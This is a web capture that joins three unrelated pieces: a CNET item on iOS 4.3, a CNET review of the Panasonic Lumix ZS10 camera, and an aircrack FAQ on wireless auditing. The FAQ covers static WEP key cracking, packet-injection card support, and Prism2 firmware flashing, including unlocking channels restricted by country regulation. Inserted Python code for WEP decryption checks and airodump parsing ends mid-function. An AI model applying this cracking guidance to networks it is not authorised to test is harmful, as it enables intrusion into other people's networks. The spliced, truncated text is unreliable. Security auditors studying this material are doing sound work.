iOS 4.3 hitting March 11



(Credit: Sarah Tew/CNET)

We previewed iOS 4.3 back in January, and now the time has almost come: the latest version of Apple's iOS software will be available March 11.

What's new this time around? Well, not as much as iOS 4.2, but there are some notable upgrades--especially if you're an iPad owner.





Support for additional multifinger multitouch gestures and swipes adds four-finger fast-swapping between open apps and a one-handed way to flick the app dock up, instead of double-clicking the home button. In fact, you'll probably be using that lone physical button a whole lot less now.

There's also a new app, Photo Booth, that will add tools for taking and tweaking self portraits, similar to what already exists on Mac OS X. Obviously, this app's limited to the camera-equipped iPad 2.

Home Sharing will allow other PC or Mac iTunes libraries with Home Sharing turned on to be accessible on your iPad, locally streamed.

Wi-Fi hot-spot support will finally enable AT&T iPhones to share their wireless connection with other devices, much like the Verizon iPhone 4.

For Apple TV owners, there are some improvements to video streaming and AirPlay support. AirPlay will also support photo slideshows, as well as video and audio streaming from third-party apps to other devices.

The built-in Safari browser should also see performance improvements running JavaScript, thanks to a new Nitro JavaScript engine.

Other small changes include yet another font switch for Notes, extra notification beep settings, and--thank goodness--an ability to restore the use of the physical iPad's orientation lock switch, which has been co-opted to become a "silencer" switch since iOS 4.2.


Panasonic Lumix DMC-ZS10 (Black)







The good: The Panasonic Lumix DMC-ZS10 has fast shooting performance and an extensive feature set.

The bad: The Panasonic Lumix DMC-ZS10 has a near-pointless touch screen; no raw capture option; noisy photos; and a short battery life.

The bottom line: The Panasonic Lumix DMC-ZS10 is a very good compact megazoom as long as you don't mind paying more for features and speedy performance than photo quality.

One of the few segments of point-and-shoots that's growing is megazooms, a category that Panasonic pretty much started. Now all manufacturers have them, though, so trying to stand out isn't easy. So for the Lumix DMC-ZS10, the update to 2010's ZS7, Panasonic did what most manufacturers do: made the lens wider and longer, kept the body size the same, and packed in a ton of features.

The basic specs include a 24mm-equivalent wide-angle lens with a 16x zoom (with nano coating to reduce ghosting and flare), a 3-inch, 460K-dot resolution touch-screen LCD, and a 14-megapixel MOS sensor. The sensor is the same type that's found in its top full-size megazoom, the FZ100, and it's paired with Panasonic's Venus Engine FHD processor. This combo allows for high-speed burst shooting--full resolution at 10 frames per second--and full HD movie capture in AVCHD format among other things.

For all its features, though, its photo quality is no better or worse than other recent high-end Panasonic point-and-shoots I've tested. Like those cameras, whether you'll like the photo quality from the ZS10 comes down to how you'll use the photos and how much cropping and enlarging you hope to do.

Key specs | Panasonic Lumix DMC-ZS10
Price (MSRP) | $399.95
Dimensions (WHD) | 4.1 x 2.3 x 1.3 inches
Weight (with battery and media) | 7.7 ounces
Megapixels, image sensor size, type | 15 megapixels, 1/2.3-inch MOS (14 megapixels effective)
LCD size, resolution/viewfinder | 3-inch touch-screen LCD, 460K dots/Electronic
Lens (zoom, aperture, focal length) | 16x, f3.3-5.9, 24-384mm (35mm equivalent)
File format (still/video) | JPEG/AVCHD (.MTS); Motion JPEG (.MOV)
Highest resolution size (still/video) | 4,320x3,240 pixels/ 1,920x1,080 at 60fps (interlaced; 17Mbps), 1,280x720 at 30fps (progressive; 17Mbps)
Image stabilization type | Optical and digital
Battery type, CIPA rated life | Li-ion rechargeable, 260 shots
Battery charged in camera | No; external charger supplied
Storage media | SD/SDHC/SDXC
Bundled software | PHOTOfunSTUDIO 6.1 HD Lite Edition (Windows); Super LoiLoScope trial version (Windows)

With plenty of light, the camera can turn out very good photos, if a little soft. When viewed at full size, there is noise present even at ISO 100. The higher the ISO, the more noise you'll see and the softer your photos get. Yellow blotching from noise is a particular problem with Panasonic's JPEG processing and it's present in varying degrees through its ISO range. It's most visible at ISO 1,600, which pretty much makes that ISO unusable. Panasonic seems to correct for the blotches at ISO 400, but in the process destroys fine detail and makes subjects look smeary. In the end, the ZS10 is best suited for outdoor use or indoors if brightly lit. Photos at or below ISO 200 can stand up to some cropping or larger prints, but low-light photos are best left for small prints and Web use. And unfortunately, with no option for raw capture, you're stuck with Panasonic's image processing.


While there is little sign of pincushioning when the lens is extended, the wide end of the lens shows some barrel distortion. The lens has good center sharpness and is reasonably consistent edge to edge. Fringing in high-contrast areas can be a bit of an issue for the ZS10. Mainly, it's more than I'm used to seeing from a Panasonic camera, but still average for this class of camera.

Color and exposure are very good from the ZS10 up to ISO 400. Subjects appear natural, bright, and pretty accurate. Plus, there are a number of ways to tweak your color results. White-balance presets are good for the most part; however, the auto white balance is not good indoors. Unfortunately, you're stuck with that setting if you're using Intelligent Auto. Whenever possible, use the presets or take a manual reading, which is really easy to do.

Lastly, though the sensor is 15 megapixels, the camera only uses 14 megapixels, making it possible to have four aspect ratios--16:9, 3:2, 4:3, and 1:1--with the same angle of view across the entire zoom range of the lens.

As for movie quality, its AVCHD clips are sharp with good exposure and color and some of the smoothest motion I've seen from a point-and-shoot. Low-light recording suffers from the same noise problems as in photos. The zoom does operate while recording, but its movement is picked up by the stereo mic. If you are recording in a very quiet environment, you will hear it in your movies, but otherwise it's difficult to hear. The camera also has an option for continuous AF for movies, which performed very well, as did its wind noise filter. Also, the ZS10 can capture 3.5-megapixel photos while shooting video as well as extract single frames for photos when in Playback mode.

General shooting options | Panasonic Lumix DMC-ZS10
ISO sensitivity (full resolution) | Auto, 100, 200, 400, 800, 1,600
White balance | Auto, Daylight, Cloudy, Shade, Incandescent, Manual
Recording modes | Intelligent Auto, Program, Aperture Priority, Shutter Priority, Manual, Custom, MySCN 1 and 2, 3D, Custom, Movie
Focus modes | Face Detection AF, 1-point AF, 1-point AF (high speed), 23-point AF, Spot AF, AF Tracking, Touch AF
Macro | 1.2 inches (Wide); 3.3 feet (Tele)
Metering modes | Multi, Center-weighted average, Spot
Color effects | Standard, Black & White, Sepia, Cool, Warm, Happy (only in iA mode)
Burst mode shot limit (full resolution) | 15 shots

As Panasonic's highest-end compact megazoom, there is no shortage of shooting options. For automatic shooting there is the company's Intelligent Auto that combines an ever-growing number of technologies to get the best results. Overall, it works very well, but photos can end up appearing overprocessed when viewed at full size. There are 29 scene modes for those times when you want to get specific with your auto shooting or get creative and you can store two favorites to MySCN spots on the mode dial. For the most part they are the ones you'd find on any point-and-shoot, but there are a few artistic ones like High Dynamic and Pinhole as well as a Handheld Night Shot that takes 10 pictures in a row and then combines them into one to reduce motion blur and noise. The down side is that it only works if your subject is stationary. There is an Underwater mode as well, but you'll need a casing if you want to get it wet--the ZS10 is not waterproof in any way. Lastly, many of the scene modes are available for movies, too, giving you a little more freedom to experiment.

For those who like to take more control, the ZS10 does offer aperture-priority, shutter-priority, and manual shooting modes. Apertures are f3.3-6.3 wide and 5.9-6.3 telephoto. Shutter speeds go from 60 seconds to 1/4,000 second. To use them, you press the Exposure button on back, and change the settings with the directional pad. (A thumb dial would've been nice, but space is already pretty tight.) There is also a Custom spot on the mode dial for setting up three custom setting configurations. There's a Program mode, too, should you want to adjust things like ISO, white balance, and exposure compensation (not done with the Exposure button, mind you, but the directional pad), but not worry about shutter speed and aperture settings.

If you shoot a lot of moving subjects, namely children, pets, and sports, the ZS10's multiple burst shooting options give you a lot of flexibility and a fighting chance of getting a good photo. Its fastest burst modes--40 and 60 frames per second--are at reduced resolutions, but Panasonic packed in three at full resolution. There's one that captures up to 15 shots at 10fps, but that sets focus, exposure, and white balance with the first shot. What's better are the 2fps and 5fps options that set those things with each shot so you're able to get a subject moving moderately fast in focus and properly exposed. However, in our lab tests the 5fps setting averaged 3.2fps.

Other aspects of its shooting performance are excellent as well and significantly faster than its predecessor. Shutter lag is low at 0.4 second and 0.7 second in bright and dim lighting, respectively. From shot-to-shot without the flash you're waiting only 1.1 seconds; adding the flash drags that time to just 1.4 seconds. Its time from off to first shot is 1.9 seconds.

The high-speed shooting also gets you 3D photos. The ZS10 fires off 20 shots as you move the camera horizontally across a scene and then picks the two best for overlaying to create a 3D MPO file that can be played back on 3D-enabled TVs, computers, and photo frames. The results are good, but your subject has to be motionless as does everything in the scene. Any movement really kills the effect. It's a nice extra to play with, but not a must-have mode.

ZS10's control panel
The ZS10's controls are well spaced and easy to use, but its touch screen is underused.

The appearance of the ZS10 doesn't change much from its predecessor, the ZS7. Its weight and size are approximately the same, remaining remarkably compact for its features and wide-angle lens with 16x zoom (that's wider and longer than its predecessor). Though it's a tight fit in a pants pocket, the ZS10 easily fits in an average jacket pocket or small handbag. The body--available in black, brown, silver, blue, and red versions--has a nice, solid feel to it with a comfortable grip on the right side.

The 3-inch touch screen on the back looks good and gets reasonably bright, though it gets reflective in direct sunlight, so you may struggle occasionally to see what you're shooting. Also, Panasonic didn't do much with the touch screen, only using it for a handful of functions. For example, you can use it to focus and shoot photos by tapping on your subject, but menu navigation is primarily done with the directional pad. In playback you can use it to flip through your shots, but you can't do any editing or drawing or writing on photos. It just seems that if you're going to be paying for a touch screen, you should get more use out of it.

One of the main attractions of the ZS10 is the built-in GPS. Using it is fairly simple, and the process has been streamlined from the ZS7 thanks to a dedicated spot in the menu system. Once you've turned on the receiver--it can be done from the Q.Menu or main menu--you can have the camera retrieve the information for your current location. In tests this took anywhere from less than a minute to several minutes depending on how much open sky was above me. Once locked, the ZS10 can display country, state, city, and landmark information and continues to update itself every minute. You can then go into the GPS Area Select menus and pick the correct information for your location. For example, if you're standing in the middle of New York, it could quite possibly have a couple pages of landmarks to pick from. Also, you can choose to limit what area information is attached, in case you only want the name of the city for instance. The area information covers 173 countries or regions for all over the world and more than half a million landmarks in 73 countries or regions.

For everyday shooting, attaching GPS information is probably not that exciting. But, if you do a lot of traveling, hiking, or other activity where you might want to remember where you were, then it's a great feature to have. Longitude and latitude are seamlessly added to the EXIF data and, again, you can have the camera include country, city, state, and landmarks.

There's an option to record AVCHD movies with GPS data as well. The location information can be viewed when videos are played back on a computer using the bundled software or directly from the camera. Unless you simply must have the information, you'll probably want to stick with the non-GPS AVCHD format option.

One last thing regarding the GPS: once you've turned it on, the receiver stays on until you turn it off, 2 hours have passed since it's refreshed its position, or after 3 hours of the camera being off. So even if you shut off the camera, it'll continue to update its location every 15 minutes. This is fine if you're shooting for an extended period of time, but it'll eventually run down your battery. If you want the GPS to turn off when you shut the camera off, you must select the Airplane mode option from the camera's menu. This is all explained in the manual, but battery life is something to keep in mind with features like GPS.

In fact, battery life with the ZS10 is an issue in general. With the GPS, touch screen, zoom, burst shooting, and HD movie capture there's a lot here to drain its small rechargeable battery. Even without all those things, the camera's battery life is pretty short. I strongly recommend picking up an extra battery if you're going to be traveling with the ZS10 or even just out for a day of shooting.

Conclusion
The cost of the Panasonic Lumix DMC-ZS10 goes primarily to its abundant feature set. That fortunately includes some very fast shooting performance and a nice zoom lens in a pocketable body. It's not unreasonable to expect excellent photos, too, for its price, but the fact is the ZS10 is still a point-and-shoot with a sensor no bigger than you'd find in a smaller, less feature-laden camera. If you're after awesome low-light photos or need to regularly make large prints, you probably shouldn't consider this camera. But if most of your photos are for sharing online and 8x10 prints or smaller, the ZS10 is a very good option. Especially if you want something that can double as a pocket video camera.

Shooting speed (in seconds)
(Shorter bars indicate better performance)
Camera | Time to first shot | Typical shot-to-shot time | Shutter lag (dim) | Shutter lag (typical)
Nikon Coolpix S8100 | 1.1 | 1.5 | 0.7 | 0.4
Panasonic Lumix DMC-ZS10 | 1.9 | 1.1 | 0.7 | 0.4
Sony Cyber-shot DSC-HX5V | 1.8 | 1.5 | 0.8 | 0.4
Canon PowerShot SD4500 IS | 2.9 | 2.3 | 0.8 | 0.6
Panasonic Lumix DMC-ZS7 | 2.3 | 2.1 | 1 | 0.6

Typical continuous-shooting speed
(Longer bars indicate better performance)
Camera | Typical continuous-shooting speed
Nikon Coolpix S8100 | 10
Sony Cyber-shot DSC-HX5V | 10
Canon PowerShot SD4500 IS | 3.6
Panasonic Lumix DMC-ZS10 | 3.2
Panasonic Lumix DMC-ZS7 | 1.7

Read more: http://reviews.cnet.com/digital-cameras/panasonic-lumix-dmc-zs10/4505-6501_7-34505718.html#ixzz1FU9MuIY2

aircrack - set of tools for auditing wireless networks

What is aircrack ?

aircrack is a set of tools for auditing wireless networks:
  • airodump: 802.11 packet capture program
  • aireplay: 802.11 packet injection program
  • aircrack: static WEP and WPA-PSK key cracker
  • airdecap: decrypts WEP/WPA capture files
This document has been translated into Spanish (thanks to ShaKarO).

Is there an aircrack discussion forum ?

Sure: http://100h.org/forums/. Also, check out #aircrack on irc.freenode.net

Where to download aircrack ?

The official download location is http://www.cr0.net:8040/code/network/. However, if you can't access port 8040 for some reason, you may use this mirror instead: http://100h.org/wlan/aircrack/.

Aircrack is included in the Troppix LiveCD, which features { Prism2 / PrismGT / Realtek / Atheros / Ralink } drivers patched for packet injection, as well as the acx100, ipw2200 (Centrino) and zd1211 drivers.

It says "cygwin1.dll not found" when I start aircrack.exe.

You can download this library from: http://100h.org/wlan/aircrack/.

To use aircrack, drag&drop your .cap or .ivs capture file(s) over aircrack.exe. If you want to pass options to the program you'll have to start a shell (cmd.exe) and manually type the command line; there is also a GUI for aircrack, developed by hexanium.

Example:

C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap ...

See below for a list of options.

How do I crack a static WEP key ?

The basic idea is to capture as much encrypted traffic as possible using airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run aircrack on the resulting capture file. aircrack will then perform a set of statistical attacks developed by a talented hacker named KoreK.

How do I know my WEP key is correct ?

There are two authentication modes for WEP:

  • Open-System Authentication: this is the default mode. All clients are accepted by the AP, and the key is never checked: association is always granted. However, if your key is incorrect you won't be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will time out.
  • Shared-Key Authentication: the client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it's never enabled by default.

In summary, just because you seem to have successfully connected to the access point doesn't mean your WEP key is correct ! To check your WEP key, try to decrypt a capture file with the airdecap program.
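Why decryption is a reliable test of the key, shown as an added example (not aircrack's code): a WEP frame body is the 3-byte IV, a key-index byte, then RC4 keyed with IV || key applied to the payload plus its CRC-32 ICV, so the key is right when the recovered ICV matches. The key, IVs and payloads below are constructed sample values, and the function names are illustrative.

```python
import struct
import zlib
from typing import Iterable, Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR of the keystream with data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_seal(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Build a WEP frame body: IV | key-index byte | RC4(plaintext | ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV must be 3 bytes")
    if len(key) not in (5, 13):
        raise ValueError("WEP key must be 5 bytes (40-bit) or 13 bytes (104-bit)")
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, plaintext + _icv(plaintext))


def wep_open(key: bytes, body: bytes) -> Optional[bytes]:
    """Return the payload if the ICV verifies under `key`, otherwise None."""
    if len(body) < 8:                      # 3 IV + 1 key index + 4 ICV
        return None
    clear = rc4(body[:3] + key, body[4:])  # per-packet RC4 key is IV || key
    payload, icv = clear[:-4], clear[-4:]
    return payload if _icv(payload) == icv else None


def key_is_correct(key: bytes, bodies: Iterable[bytes]) -> bool:
    """Accept a key only if every sampled frame verifies.

    A wrong key passes the 32-bit ICV of a single frame by chance about
    once in 2**32 tries, so checking several frames removes any doubt.
    """
    bodies = list(bodies)
    return bool(bodies) and all(wep_open(key, b) is not None for b in bodies)


# Constructed sample data: a 40-bit key, two payloads behind an LLC/SNAP header.
KEY = bytes.fromhex("0102030405")
WRONG_KEY = bytes.fromhex("0102030406")
PAYLOADS = [
    bytes.fromhex("aaaa030000000806") + b"constructed ARP body",
    bytes.fromhex("aaaa030000000800") + b"constructed IP body",
]
FRAMES = [wep_seal(KEY, bytes([0x10, 0x20, n]), p) for n, p in enumerate(PAYLOADS)]

if __name__ == "__main__":
    print("correct key verifies:", key_is_correct(KEY, FRAMES))
    print("wrong key verifies:  ", key_is_correct(WRONG_KEY, FRAMES))
```

With Open-System Authentication the access point performs no such check at association time, which is why a wrong key only shows up later as traffic that fails to decrypt.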

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you're out of luck you may need two million IVs, or more.

There's no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump can not report the WEP key length. Thus, it is recommended to run aircrack twice: when you have 250.000 IVs, start aircrack with "-n 64" to crack 40-bit WEP. Then if the key isn't found, restart aircrack (without the -n option) to crack 104-bit WEP.

I can't seem to capture any IVs !

Possible reasons:
  • You are standing too far from the access point.
  • There is no traffic on the target wireless network.
  • There is some G traffic but you're capturing in B mode.
  • Something is wrong with your card (firmware problem ?)

By the way, beacons are just unencrypted announcement packets. They're totally useless for WEP cracking.

I've been unable to crack this AP !

Shit happens.

Why is there no Windows version of aireplay ?

The PEEK driver doesn't support 802.11 packet injection; I will not port aireplay on Win32. However, there are commercial alternatives:

Prism cards: http://www.tuca-software.com/transmit.php

Atheros cards: http://www.tamos.com/htmlhelp/commwifi/pgen.htm

Is my card compatible with airodump / aireplay ?

First of all, search Google to find which chipset your card has. For example, if you have a Linksys WPC54G search for "wpc54g chipset linux".

Chipset | Supported by airodump for Windows ? | Supported by airodump for Linux ? | Supported by aireplay for Linux ?
HermesI | YES (Agere driver) | YES (patched orinoco driver) | NO (firmware corrupts the MAC header)
Prism2/3 | NO, but see LinkFerret for an alternative | YES (HostAP or wlan-ng driver), STA firmware 1.5.6 or newer required | YES (PCI and CardBus only, driver patching required)
PrismGT | YES (PrismGT driver) | FullMAC: YES (prism54 driver), SoftMAC: NOT YET (prism54usb) | YES (driver patching recommended)
Atheros | CardBus: YES (Atheros driver), PCI: NO (see CommView WiFi instead) | YES (PCI and CardBus only, madwifi driver) | YES (driver patching required)
RTL8180 | YES (Realtek driver) | YES (rtl8180-sa2400 driver) | UNSTABLE (driver patching required)
Aironet | YES? (Cisco driver) | YES (airo driver, firmware 4.25.30 recommended) | NO (firmware issue)
Ralink | NO | YES (rt2500 / rt2570 driver) | YES (driver patching required)
Centrino b | NO | PARTIAL: the ipw2100 driver doesn't discard corrupted packets | NO
Centrino b/g | NO | YES (ipw2200 driver, 1.0.6 recommended) | NO (firmware drops packets)
Broadcom | Old models only (BRCM driver) | NOT YET (bcm43xx driver, Linux >= 2.6.14 required) | NO
TI (ACX100 / ACX111) | NO | UNTESTED (acx100 driver) | NO
ZyDAS 1201 | NO | YES (zd1211 driver) | NO
Others (Marvel...) | NO | UNKNOWN | NO

The PEEK driver does not recognize my card.

Some cards are not recognized by the Windows drivers above, even though they have the correct chipset. In this case, open the hardware manager, select your card, "Update the driver", select "Install from a specific location", select "Don't search, I will choose the driver to install", click "Have disk", set the path to where the driver has been unzipped, uncheck "Show compatible hardware", and finally choose the driver.

I have a Prism2 card, but airodump / aireplay doesn't seem to work !

First step, make sure you aren't using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However, if the interface name is eth0 or eth1, then the driver is orinoco and you must disable the driver (use cardctl ident to find your card identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

Also, it can be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date -- see below for instructions. The recommended station firmware version is 1.7.4. If it doesn't work well (kismet or airodump stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones).

On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices w/ wlan-ng.

Note: a Windows XP driver for Prism2 cards with WPA/TKIP support can be found here: http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe.

I have an Atheros card, and the madwifi patch crashes the kernel / aireplay keeps saying enhanced RTC support isn't available.

There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11 was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is just broken. Thus, it is highly recommended to use Linux 2.6.11.x or newer.

How do I update my Prism2 firmware ?

The simplest way is to upgrade the firmware with WinUpdate; this requires the WPC11 driver v2.5 to be installed. Both can be found at: http://100h.org/wlan/linux/prism2/.

You may also update the firmware with patched HostAP (see below for instructions on how to patch and install HostAP). Alternatively, you may boot the Troppix Live CD (which already has a patched hostap driver and the prism2_srec utility).

Now that HostAP is loaded, you can check your firmware's primary and station version with this command:

# dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1 (primary firmware is 1.1.1)
wifi0: STA: id=0x1f v1.7.4 (station firmware is 1.7.4)
wifi0: registered netdevice wlan0

If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2 and MUST use STA firmware version 1.5.6 (s1010506.hex). Otherwise, you should use PRI 1.1.1 / STA 1.7.4 which is the most stable firmware version for newer Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people have reported having trouble with them.

To update the firmware, you'll need prism2_srec from the hostap-utils package; if it's not present on your system, download and compile hostap-utils:

wget http://100h.org/wlan/linux/prism2/hostap-utils-0.4.0.tar.gz
tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0
make

Some Prism2 cards have been restricted to a certain set of channels because of country regulation. You can activate all 14 channels with the following commands:

./prism2_srec wlan0 -D > pda; cp pda pda.bak
Edit pda and put 3FFF at offset 0104 (line 24)

Finally, download the firmware and flash your card. If the NIC id is between 0x8002 and 0x8008:

wget http://100h.org/wlan/linux/prism2/s1010506.hex
./prism2_srec -v -f wlan0 s1010506.hex -P pda

Otherwise:

wget http://100h.org/wlan/linux/prism2/pk010101.hex
wget http://100h.org/wlan/linux/prism2/sf010704.hex
./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda

If you get the message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported", the HostAP driver is not loaded and you must install it. If you get the message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported", then your HostAP driver has not been patched for non-volatile download support.

Which is the best card to buy ?

The best chipset nowadays is Atheros; it is very well supported under Linux, and also under Windows (PCMCIA/CardBus only). The latest madwifi patch makes it possible to inject raw 802.11 packets in either Managed or Monitor mode at arbitrary b/g speeds.

Ralink makes some nice b/g chipsets, and has been very cooperative with the open-source community to release GPL drivers. Packet injection is now fully supported under Linux on PCI/CardBus RT2500 cards, and also works on USB RT2570 devices.

Here's a list of recommended cards:

Card name | Type | Chipset | Antenna | Price | Windows support | Linux support
MSI PC54G2 | PCI | Ralink | RP-SMA | E30 | No | Yes
MSI CB54G2 | CardBus | Ralink | Internal | E30 | No | Yes
Linksys WMP54G v4 | PCI | Ralink | RP-SMA | E40 | No | Yes
Linksys WUSB54G v4 | USB | Ralink | Internal | E40 | No | Yes
D-Link DWL-G122 | USB | Ralink | Internal | E45 | No | Yes
Netgear WG111 | USB | PrismGT SoftMAC | Internal | E40 | airodump | No
Netgear WG311T | PCI | Atheros | RP-SMA | E50 | CommView WiFi | Yes
Netgear WG511T | CardBus | Atheros | Internal | E50 | airodump | Yes
Netgear WAG511 | CardBus | Atheros | Internal | E100 | airodump | Yes
Proxim 8470-WD | CardBus | Atheros | MC + Int. | E110 | airodump | Yes

Note: there are some cheaper models with a similar name (WG511, WG311 and DWL-G520+); those cards are not Atheros-based. Also, the Peek driver does not support recent Atheros cards, so you'll have to use CommView WiFi instead.

How do I use airodump for Windows ?

First of all, make sure that your card is compatible (see table above) and that you have installed the proper driver.

When running airodump, you should specify:

  • The network interface index number, which must be picked in the list displayed by airodump.
  • The network interface type ('o' for HermesI and Realtek, 'a' for Aironet, Atheros, Broadcom and PrismGT).
  • The channel number, between 1 and 14. You can also specify 0 to hop between all channels.
  • The output prefix. For example, if the prefix is "foo", then airodump will create foo.cap (captured packets) and foo.txt (CSV statistics). If foo.cap already exists, airodump will resume the capture session by appending the packets to it.
  • The "only IVs" flag. Specify 1 if you just want to save the IVs from WEP data packets. This saves space, but the resulting file (foo.ivs) will only be useful for WEP cracking.

To stop capturing packets, press Ctrl-C. You may get a blue screen; this is due to a bug in the PEEK driver not cleanly exiting monitor mode. Also, the capture file may be empty. The cause of this bug is unknown.

Why can't I compile airodump and aireplay on BSD / Mac OS X ?

Both airodump and aireplay sources are Linux-specific. There are no plans to port them to any other operating system.

How do I use airodump for Linux ?

Before running airodump, you may start the airmon.sh script to list the detected wireless interfaces. It is possible, but not recommended, to run Kismet and airodump at the same time.
  usage: airodump   [channel] [IVs flag]

Specify 0 as the channel to hop between 2.4 GHz channels.
Set the optional IVs flag to 1 to only save the captured
IVs - the resulting file is only useful for WEP cracking.

If the gpsd daemon is running, airodump will retrieve and
save the current GPS coordinates in text format.

You can convert a .cap / .dump file to .ivs format with the pcap2ivs program (linux only).

airodump keeps switching between WEP and WPA.

This is happening because your driver doesn't discard corrupted packets (that have an invalid CRC). If it's a Centrino b, it just can't be helped; go buy a better card. If it's a Prism2, try upgrading the firmware.

What's the meaning of the fields displayed by airodump ?

airodump will display a list of detected access points, and also a list of connected clients ("stations"). Here's an example screenshot using a Prism2 card with HostAP:
 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:13:10:30:24:9C   46       15     3416   6  54. WEP   the ssid
 00:09:5B:1F:44:10   36       54        0  11  11  OPN   NETGEAR

 BSSID              STATION            PWR  Packets  Probes

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid

Field | Description
BSSID | MAC address of the access point.
PWR | Signal level reported by the card. Its meaning depends on the driver, but as the signal gets higher you get closer to the AP or the station. If PWR == -1, the driver doesn't support signal level reporting.
Beacons | Number of announcement packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
# Data | Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
CH | Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump is not hopping, because of radio interference.
MB | Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is supported.
ENC | Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA), WEP (without the question mark) indicates static or dynamic WEP, and WPA if TKIP or CCMP is present.
ESSID | The so-called "SSID", which can be empty if SSID hiding is activated. In this case, airodump will try to recover the SSID from probe responses and association requests.
STATION | MAC address of each associated station. In the screenshot above, two clients have been detected (00:09:5B:EB:C5:2B and 00:02:2D:C1:5D:1F).
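The field descriptions above can be turned into a small audit helper. This added example (not part of aircrack) parses airodump's text display and labels each access point from its ENC and MB columns; the 00:11:22:33:44:55 row, the verdict labels and the function names are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

MAC = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# ENC column values from the field table, mapped to an audit verdict
# (the verdict labels themselves are this example's own).
VERDICT = {"OPN": "open", "WEP": "wep", "WEP?": "undetermined", "WPA": "wpa"}

# The first two AP rows and both station rows are the screenshot from this
# page; the 00:11:22:33:44:55 row is constructed (hidden ESSID, PWR == -1).
SAMPLE = """\
 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:13:10:30:24:9C   46       15     3416   6  54. WEP   the ssid
 00:09:5B:1F:44:10   36       54        0  11  11  OPN   NETGEAR
 00:11:22:33:44:55   -1      120       40   1  54  WPA

 BSSID              STATION            PWR  Packets  Probes

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid
"""


@dataclass
class AccessPoint:
    bssid: str
    pwr: int
    beacons: int
    data: int
    channel: int
    max_rate: int
    short_preamble: bool   # trailing dot in the MB column
    enc: str
    essid: str             # empty when the SSID is hidden
    stations: list = field(default_factory=list)

    @property
    def signal_reported(self) -> bool:
        return self.pwr != -1          # -1: driver cannot report signal level

    @property
    def phy(self) -> str:
        if self.max_rate == 11:
            return "802.11b"
        if self.max_rate == 22:
            return "802.11b+"
        return "802.11g" if self.max_rate > 22 else "unspecified"


def parse_airodump(text: str) -> list:
    """Parse AP rows and station rows; headers and malformed lines are skipped."""
    aps = {}
    for line in text.splitlines():
        tok = line.split()
        if len(tok) < 2 or not MAC.match(tok[0]):
            continue                              # header or blank line
        bssid = tok[0].upper()
        if MAC.match(tok[1]):                     # station row
            if bssid in aps:
                aps[bssid].stations.append(tok[1].upper())
            continue
        if len(tok) < 7:
            continue
        try:
            aps[bssid] = AccessPoint(
                bssid=bssid, pwr=int(tok[1]), beacons=int(tok[2]),
                data=int(tok[3]), channel=int(tok[4]),
                max_rate=int(tok[5].rstrip(".")),
                short_preamble=tok[5].endswith("."),
                enc=tok[6], essid=" ".join(tok[7:]),  # ESSID may contain spaces
            )
        except ValueError:
            continue                              # non-numeric column: skip row
    return list(aps.values())


def audit(aps) -> dict:
    """Map each BSSID to a verdict so open and WEP networks stand out."""
    return {ap.bssid: VERDICT.get(ap.enc, "unknown") for ap in aps}


if __name__ == "__main__":
    for ap in parse_airodump(SAMPLE):
        name = ap.essid or "<hidden>"
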